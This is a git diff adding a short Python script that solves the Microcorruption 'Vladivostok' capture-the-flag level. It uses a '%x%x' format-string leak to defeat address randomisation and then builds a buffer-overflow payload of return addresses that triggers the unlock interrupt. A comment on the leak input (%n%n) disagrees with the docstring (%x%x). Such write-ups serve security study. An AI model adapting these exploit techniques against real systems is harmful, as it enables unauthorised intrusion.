Solve Vladivostok

vladivostok.py

@@ -0,0 +1,49 @@
+"""
+Script to solve https://microcorruption.com/debugger/Vladivostok
+
+- Enter '%x%x' into the username field to get the printf-location
+- Input the printf-location into this script
+- Enter the output string into the password field to solve
+
+"""
+
+
+def reverse_byte_order(hex_int):
+    hex_str = hex(hex_int)
+
+    # Ensure the hex string has an even number of characters
+    if len(hex_str) % 2 != 0:
+        hex_str = "0" + hex_str
+
+    # Reverse the byte order in groups of two
+    byte_reversed = "".join(reversed([hex_str[i:i + 2] for i in range(0, len(hex_str), 2)]))
+    return byte_reversed[:-2]
+
+
+def get_printf_address():
+    hex_str = input("Enter a hex string: ")
+    num = int(hex_str, 16)
+    return num
+
+
+def compute_solution():
+    # These are the addresses for the program at its original location.
+    PRINTF_ADDR = 0x476a # This is the address we can extract via '%n%n'
+    INT_ADDR = 0x48ec # This is the address where we can push a specific value to R14
+    PUSH_R14_ADDR = 0x4954 # This location triggers an interrupt with R14 as the INT selector
+
+
+    random_printf_addr = get_printf_address()
+    random_int_addr = random_printf_addr + (INT_ADDR - PRINTF_ADDR)
+    random_push_r14_addr = random_printf_addr + (PUSH_R14_ADDR - PRINTF_ADDR)
+
+    solution_string = "aaaaaaaaaaaaaaaa" # Initial offset
+    solution_string += reverse_byte_order(random_int_addr)
+    solution_string += reverse_byte_order(random_push_r14_addr)
+    solution_string += "7f00"
+    print(solution_string)
+
+
+if __name__ == "__main__":
+    compute_solution()
+